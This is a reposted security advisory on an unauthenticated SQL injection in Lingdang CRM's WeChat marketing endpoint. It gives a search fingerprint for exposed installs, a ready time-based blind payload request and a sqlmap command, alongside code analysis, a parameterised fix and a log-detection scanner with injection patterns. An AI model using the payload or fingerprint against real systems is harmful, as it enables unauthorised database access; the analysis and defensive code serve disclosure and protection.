灵当CRM (Lingdang CRM) has an unauthenticated front-end SQL injection vulnerability

admin, 2024-11-07 16:19:59, 15 views, 4137 characters, reading time 13 min 47 s
 

0x00 Preface

灵当CRM positions itself as a personalized CRM solution for enterprises covering digital customer management, automated sales management, intelligent service management and integrated project management, building a full-lifecycle digital management system for sustainable performance growth. This new-generation CRM focuses on on-premises private deployment, integrates management and finance systems, supports multiple ERP interfaces, and unifies data so that information silos are eliminated.

Fofa fingerprint: body="include/js/ldAjax.js"


0x01 Vulnerability Analysis

The file /crm/WeiXinApp/marketing/index.php works as a front controller: it pulls in six controller files with require_once, then reads module from $_REQUEST to pick the controller and action to pick the method that is invoked on it. Nothing in this file checks that the caller is authenticated before the call, so any public method of the selected controller is reachable with a single unauthenticated request (the function parameter does the same for WechatPublic).

<?php
header("Access-Control-Allow-Origin:*");
error_reporting(E_ALL^E_NOTICE^E_WARNING);
header('Content-Type:text/html;charset=UTF-8');
header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
header("Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With");
$root_dir=dirname(dirname(dirname(__FILE__)));//project root directory
include($root_dir.'/includefile.php');
// require_once($root_dir.'/include/Zend/Json.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxCrawler.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxUsers.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxArticles.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxAmbassador.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/SmsSender.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxOrder.php');
$obj = new  WechatPublic($root_dir);
/***
 * Handles inserting WeChat-authorized users into the table
 */
if(isset($_REQUEST['function'])){
    $function = $_REQUEST["function"];
    $res = $obj->$function();
    echo ldcrm_json_encode($res);
}
// action module
/**
 * Handles the WeChat lead-generation article functions: article list, article detail, etc.
 */
$module = $_REQUEST['module'];
global $adb;
switch ($module){
    case "Articles":$controller = new WxArticles($adb,$root_dir);break;
    case "Users":$controller = new WxUsers($adb,$root_dir);break;
    case "Ambassador":$controller = new WxAmbassador($adb,$root_dir);break;
    case "SmsSender":$controller = new SmsSender($adb,$root_dir);break;
    case "WxOrder":$controller = new WxOrder($adb,$root_dir);break;
    default :$controller = new WechatPublic($root_dir);break;
}
if(isset($_REQUEST['action'])){
    $action  = $_REQUEST['action'];
    $res = $controller->$action();
    if($action!="viewpdf"){
        if(isset($res['code'])){
            $code = $res['code'];
            unset($res['code']);
        }else{
            $code = 1;
        }
        $_REQUEST['diony'] = 'yes';
        ConvertTojsonString($code,$res,'success');
    }
}

The injection itself is in the getActionList method of the WxUsers controller (/crm/WeiXinApp/marketing/controller/WxUsers.php). It reads userid from $_REQUEST and concatenates it straight into the SQL string. Note that userid is used twice: once through the ? placeholder passed to pquery(), which is bound safely, and once appended unquoted after l.wx_user_id<> in $where, which is not, so the bound copy gives no protection. operate and keyWords are concatenated into the same $where string in the same way.

/**
 * @return array[]
 * @throws Exception
 * Get the visitor log list for the current user: like = thumbs-up, look = view, share = forward, copy = repost (claim)
 */
public function getActionList(){
    $userid = $_REQUEST['userid'];
    $operate = $_REQUEST['operate'];
    $keyWords = $_REQUEST['keyWords'];
    $page = $_REQUEST['page'];
    $limit = 10;
    $start = $page*$limit;
    $where = "";
    if(empty($keyWords)){
      $where .= " 1=1 ";
    }else{
      $where .= " (locate(trim('$keyWords'),u.nickname)>0) ";
    }
    if($operate == 'like'){
      $where .= " and (l.type = 'like' or l.type = 'unlike')";
    }else{
      $where .= " and l.type = '".$operate."'";
    }
    //exclude the user's own rows
    $where .= " and l.wx_user_id<>".$userid;
    //$select_sql = "select u.nickname,u.avatar,a.title,l.createdtime,l.type from ld_wx_user_log l left join ld_articles a on l.articlesid=a.articlesid left join ld_wx_users u on u.id=a.wx_user_id where wx_user_id = ? and ".$where;
    $count_sql = "select distinct u.id from ld_wx_user_log l inner join ld_articles a on l.articlesid=a.articlesid left join ld_wx_users u on u.id=l.wx_user_id where a.wx_user_id = ? and a.deleted=0 and ".$where;
    $count_res = $this->adb->pquery($count_sql,[$userid]);
    $totalRows = $this->adb->num_rows($count_res);
    $pages = ceil($totalRows/$limit);
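To make the two uses of userid concrete, the following is an added example (not code from 灵当CRM or from the original post) that mirrors the string assembly of getActionList in Python so the final statement can be inspected, and puts a hardened builder beside it. Because $userid is appended after <> without quotes, the demonstration uses a numeric-context payload such as 1 AND SLEEP(5). The quoting used to stand in for $this->adb->pquery() is an assumption about the framework, not its real implementation; the allowed operate values are the ones named in the method's docblock.

```python
# Added illustration, not Lingdang CRM code: the string assembly of
# WxUsers::getActionList() is mirrored in Python so the final SQL can be
# inspected, and a hardened builder is shown beside it. The quoting applied
# for the '?' placeholder stands in for $this->adb->pquery() and is an
# assumption about the framework, not its real implementation.
from typing import Dict, List, Tuple


def _quote(value: str) -> str:
    """Assumed pquery() behaviour: quote the bound value, escape quotes and backslashes."""
    escaped = value.replace("\\", "\\\\").replace("'", "\\'")
    return f"'{escaped}'"


def build_count_sql_vulnerable(req: Dict[str, str]) -> str:
    """Mirror of the original: userid, operate and keyWords are pasted into
    $where; only the first use of userid goes through the '?' placeholder."""
    userid = req.get("userid", "")
    operate = req.get("operate", "")
    key_words = req.get("keyWords", "")

    if not key_words:
        where = " 1=1 "
    else:
        where = f" (locate(trim('{key_words}'),u.nickname)>0) "
    if operate == "like":
        where += " and (l.type = 'like' or l.type = 'unlike')"
    else:
        where += f" and l.type = '{operate}'"
    where += " and l.wx_user_id<>" + userid  # unquoted numeric context, unvalidated

    count_sql = (
        "select distinct u.id from ld_wx_user_log l "
        "inner join ld_articles a on l.articlesid=a.articlesid "
        "left join ld_wx_users u on u.id=l.wx_user_id "
        "where a.wx_user_id = ? and a.deleted=0 and " + where
    )
    # pquery($count_sql, [$userid]) binds the '?' safely; the copy of userid
    # already inside $where is untouched, so the statement is still injectable.
    return count_sql.replace("?", _quote(userid), 1)


ALLOWED_OPERATE = {"like", "look", "share", "copy"}  # values named in the PHP docblock


def build_count_sql_fixed(req: Dict[str, str]) -> Tuple[str, List[object]]:
    """Hardened builder: integer-validate userid, whitelist operate and bind
    every user-controlled value through a placeholder. Returns (sql, params)
    in placeholder order, ready to hand to pquery()."""
    try:
        userid = int(req.get("userid", ""))
    except ValueError:
        raise ValueError("userid must be an integer") from None
    operate = req.get("operate", "")
    if operate not in ALLOWED_OPERATE:
        raise ValueError("operate must be one of %s" % sorted(ALLOWED_OPERATE))
    key_words = req.get("keyWords", "")

    params: List[object] = [userid]  # binds a.wx_user_id = ?
    if key_words:
        where = " (locate(trim(?),u.nickname)>0) "
        params.append(key_words)
    else:
        where = " 1=1 "
    if operate == "like":
        where += " and (l.type = 'like' or l.type = 'unlike')"
    else:
        where += " and l.type = ?"
        params.append(operate)
    where += " and l.wx_user_id<>?"
    params.append(userid)

    sql = (
        "select distinct u.id from ld_wx_user_log l "
        "inner join ld_articles a on l.articlesid=a.articlesid "
        "left join ld_wx_users u on u.id=l.wx_user_id "
        "where a.wx_user_id = ? and a.deleted=0 and " + where
    )
    return sql, params


if __name__ == "__main__":
    print(build_count_sql_vulnerable({"userid": "1 AND SLEEP(5)"}))
    print(build_count_sql_fixed({"userid": "7", "operate": "look", "keyWords": "bob"}))
```

Running the vulnerable builder with userid=1 AND SLEEP(5) shows the bound copy rendered as the harmless string '1 AND SLEEP(5)' while the tail of the statement ends in l.wx_user_id<>1 AND SLEEP(5), which is where the delay comes from. The fixed builder rejects that input before any SQL is built; casting to int alone would have closed this sink, but binding operate and keyWords as well removes the two sibling sinks in the same $where string.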

0x02 Reproduction

Payload (time-based blind; when the injection succeeds the response is delayed by the SLEEP(5)):

GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=%27%20AND%20(SELECT%203408%20FROM%20(SELECT(SLEEP(5)))HtiS)--%20cbVc HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


The same injection point can be confirmed with sqlmap:

python sqlmap.py -u "http://website/crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=1" --level=3 --dbms=mysql
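On the defensive side, the request shape above is easy to pick out of web-server logs. The following is an added detection example (not from the original post or from 灵当CRM): it scans combined-format access log lines for requests to module=Users&action=getActionList whose userid is not a plain integer or whose operate/keyWords carry SQL metacharacters. The log lines in SAMPLE_LOG are constructed for the demonstration. One caveat that follows from the dispatcher reading $_REQUEST: the same parameters can arrive in a POST body or a cookie, which an access log does not record, so this check only covers the query-string form.

```python
# Added detection example, not from the original post or from Lingdang CRM:
# scan combined-format access log lines for requests to the getActionList
# endpoint whose parameters do not look like the integer / keyword values the
# PHP expects. SAMPLE_LOG is constructed data. Because the endpoint reads
# $_REQUEST, parameters sent in a POST body or cookie never reach the access
# log; this scanner only sees the query string.
import re
from typing import Any, Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

TARGET_PATH = "/crm/WeiXinApp/marketing/index.php"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Metacharacters that never belong in a nickname search or an operate keyword.
SQL_META = re.compile(r"(?i)sleep\s*\(|benchmark\s*\(|union\s+select|--|/\*|'|\"|;")


def parse_line(line: str) -> Optional[Dict[str, Any]]:
    """Split one access-log line into ip, timestamp, path and decoded query."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec: Dict[str, Any] = dict(m.groupdict())
    parts = urlsplit(m.group("uri"))
    rec["path"] = parts.path
    # parse_qs percent-decodes, so %27 in the log becomes a literal quote here.
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return rec


def classify(rec: Dict[str, Any]) -> Optional[str]:
    """Return a reason if the request looks like injection against
    module=Users&action=getActionList, otherwise None."""
    if rec["path"] != TARGET_PATH:
        return None
    q: Dict[str, str] = rec["query"]
    if q.get("module") != "Users" or q.get("action") != "getActionList":
        return None
    userid = q.get("userid", "")
    if re.fullmatch(r"\d+", userid) is None:
        return f"non-numeric userid: {userid!r}"
    for name in ("operate", "keyWords"):
        value = q.get(name, "")
        if SQL_META.search(value):
            return f"SQL metacharacters in {name}: {value!r}"
    return None


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify() over every line; return one hit per suspicious request."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reason = classify(rec)
        if reason is not None:
            hits.append({"ip": str(rec["ip"]), "ts": str(rec["ts"]), "reason": reason})
    return hits


SAMPLE_LOG = [  # constructed sample data: one benign call, three probes, one unrelated module
    '203.0.113.10 - - [07/Nov/2024:16:20:01 +0800] "GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=42&operate=look&page=0 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Nov/2024:16:20:05 +0800] "GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=%27%20AND%20(SELECT%203408%20FROM%20(SELECT(SLEEP(5)))HtiS)--%20cbVc HTTP/1.1" 200 131 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Nov/2024:16:20:11 +0800] "GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=1%20AND%20SLEEP(5) HTTP/1.1" 200 131 "-" "sqlmap"',
    '203.0.113.10 - - [07/Nov/2024:16:21:00 +0800] "GET /crm/WeiXinApp/marketing/index.php?module=Articles&action=getList&id=5 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [07/Nov/2024:16:21:30 +0800] "GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=9&operate=look%27%20or%201=1--%20- HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The userid rule is strict on purpose: the PHP compares it numerically, so anything other than digits (including an empty value) is either an error or a probe, and a time-based payload does not need a quote to land. Tightening the SQL_META list to fewer characters reduces noise from nickname searches at the cost of missing quieter probes.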


Tags: code audit, 0day, penetration testing, system, general, 闲鱼, 转转

To get the 灵当CRM source code, follow the public account and send 241013.

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided for security research and teaching only. Readers who use this information for any other purpose bear all legal and joint liability themselves; the author and this public account accept no legal or joint liability. Please take note.

Originally published by the WeChat public account 星悦安全: (1day) 灵当CRM unauthenticated front-end SQL injection vulnerability

When reposting, keep this link (CN-SEC中文网; credit to the original author): https://cn-sec.com/archives/3368889.html
